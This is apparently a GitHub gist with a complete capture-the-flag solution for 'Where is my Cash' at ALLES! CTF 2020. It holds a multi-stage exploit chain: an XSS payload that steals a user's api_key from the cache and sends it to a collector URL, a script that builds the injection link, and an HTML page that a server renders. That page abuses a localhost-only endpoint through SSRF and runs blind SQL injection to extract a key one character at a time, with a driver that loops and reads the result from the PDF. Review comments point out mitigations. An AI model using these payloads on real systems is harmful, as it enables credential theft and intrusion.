@l4yton
Created September 6, 2020 19:00
Solution for "Where is my Cash" at the ALLES! CTF 2020
// Stage 1: script that runs in the browser of whoever opens the crafted link.
// It reads that user's profile JSON from the API and then navigates the
// browser to `requestbin` with the api_key appended to it.
// `requestbin` is an empty placeholder on this page (collector base URL).
let requestbin = "";

// cache: "force-cache" makes fetch() accept any cached copy of the response,
// fresh or stale, and only go to the network when nothing is cached.
// NOTE(review): presumably the profile response was cacheable and already in
// the victim browser's HTTP cache - confirm against the challenge setup.
// Serving key-bearing responses with "Cache-Control: no-store" removes that
// cached copy. The read also depends on the API's CORS policy allowing this
// origin to see the response body, which is not shown here.
fetch("https://api.wimc.ctf.allesctf.net/1.0/user", {
  cache: "force-cache",
  method: "GET",
})
  .then((response) => response.json())
  .then((body) => {
    // Top-level navigation carries the key out in the URL itself.
    document.location.href = requestbin + body.data.api_key;
  });
#!/usr/bin/env python3
import base64
import urllib.parse
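# Load the stage-1 script; the context manager closes the handle, which the
# bare open(...).read() left to the garbage collector.
with open('stage1.js', 'r') as script_file:
    payload = script_file.read()

# Base64 keeps quotes and newlines of the script out of the URL. The result is
# percent-encoded twice, so it is still percent-encoded after one decoding pass.
encoded = urllib.parse.quote(
    urllib.parse.quote(base64.b64encode(payload.encode()).decode())
)

# The api_key value starts and ends with a double quote and wraps
# eval(atob(...)) between two minus operators.
# NOTE(review): this only executes if the page copies api_key into a
# double-quoted JavaScript string without escaping - presumably what the
# challenge page does; confirm. Escaping the value for the JS-string context,
# or a CSP that forbids inline script and eval, would leave it inert.
url = f'https://wimc.ctf.allesctf.net/?api_key="-eval(atob("{encoded}"))-"'
print(url)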
<span style="color: green;" id="goodChars" name="goodChars"></span>
<br>
<span style="color: red;" id="badChars" name="badChars"></span>
<br>
<span style="color: indigo;" id="errorOut" name="errorOut"></span>
<script>
try {
  // Stage 2: runs inside whatever renders this HTML. Every request targets
  // http://localhost:1337/internal/..., i.e. a loopback-only endpoint of the
  // rendering host. Rendering submitted HTML with scripting disabled and
  // without network access to loopback would stop this page from doing anything.
  //
  // Kept to ES5 syntax (var, function expressions, XMLHttpRequest) like the
  // original; the renderer's JavaScript engine is not shown on this page.

  // Characters tried at each position of the value being recovered.
  var ALPHABET = '0123456789abcdef';
  // Replaced with the already-known prefix by the driver script before upload.
  var PREFIX = "__TOKEN__";

  /**
   * Sends one probe per alphabet character for the position after `prefix`.
   */
  function probeNextPosition(prefix) {
    var index;
    for (index = 0; index < ALPHABET.length; index += 1) {
      testChar(ALPHABET.charAt(index), prefix);
    }
  }

  /**
   * Handles a state change of one probe request.
   *
   * HTTP 200 is read as "prefix + candidate matches": the candidate is
   * appended to #goodChars and the next position is probed. Any other status
   * is read as a miss and the candidate is appended to #badChars.
   * NOTE(review): why a miss yields a non-200 status is not visible here;
   * presumably the subquery returns NULL and the insert fails - confirm.
   */
  function judgeChar(xhr, candidate, prefix) {
    if (xhr.readyState !== 4) {
      return;
    }

    // A sibling probe for this position already matched, so this answer is stale.
    var positionAlreadySolved = goodChars.innerText.length > prefix.length;
    if (positionAlreadySolved) {
      return;
    }

    if (xhr.status === 200) {
      goodChars.innerText += candidate;
      badChars.innerText = '';
      // Continue from what the page now shows as the confirmed prefix.
      probeNextPosition(goodChars.innerText);
      return;
    }

    badChars.innerText += candidate;
  }

  /**
   * Issues one probe for `prefix + candidate`.
   *
   * The `balance` form field carries a SQL fragment instead of a number.
   * It only has an effect if the endpoint concatenates the field into its
   * statement (server code is not on this page - presumably it does).
   * Binding `balance` as a typed query parameter makes the fragment inert.
   */
  function testChar(candidate, prefix) {
    var balanceField =
      "(SELECT 1337 FROM general AS g WHERE g.api_key LIKE '" +
      prefix + candidate +
      "%' AND g.user_id = '13371337-1337-1337-1337-133713371337'),'test');-- ";

    var request = new XMLHttpRequest();
    request.open('POST', 'http://localhost:1337/internal/createTestWallet', true);
    request.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    request.onreadystatechange = function () {
      judgeChar(request, candidate, prefix);
    };
    request.send('balance=' + encodeURIComponent(balanceField));
  }

  // #goodChars is the first element on the page, so the confirmed prefix ends
  // up as the first text line of the rendered output.
  goodChars.innerText = PREFIX;
  probeNextPosition(PREFIX);
} catch (err) {
  // Surface script errors in the rendered output.
  errorOut.innerText = err;
}
</script>
#!/usr/bin/env python3
import os
import sys
import requests
import pdftotext
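# Driver for stage 2: repeatedly submits stage2.html to the report endpoint and
# reads the recovered prefix back from the first text line of the returned PDF.
#
# NOTE(review): indentation was lost on this page; the loop body below is
# reconstructed, with everything after the `while` line treated as part of it.
url = 'https://api.wimc.ctf.allesctf.net/1.0/admin/createReport'
headers = {
    # Left empty on the page; presumably the admin API token goes here.
    'X-API-TOKEN': ''
}

with open('stage2.html', 'r') as f:
    template = f.read()

token = ''
# Each round feeds the prefix recovered so far back into the template.
while len(token) < 30:
    payload = template.replace('__TOKEN__', token)
    r = requests.post(url, headers=headers, data={"html": payload})

    # A very short body is treated as an error message rather than a PDF.
    if len(r.text) < 100:
        print(r.text, file=sys.stderr)
        # sys.exit instead of the site-provided exit(), which is not
        # guaranteed to exist outside interactive sessions.
        sys.exit(1)

    # pdftotext reads from a file object, so the body goes through a temp
    # file. Context managers close the handles, and the finally clause removes
    # the file even if PDF parsing raises.
    try:
        with open('result.pdf', 'wb') as result:
            result.write(r.content)
        with open('result.pdf', 'rb') as result:
            pdf = pdftotext.PDF(result)
    finally:
        if os.path.exists('result.pdf'):
            os.remove('result.pdf')

    # First line of the first page holds the #goodChars text of stage2.html.
    token = pdf[0].split('\n')[0]
    print(f'Got token: {token}')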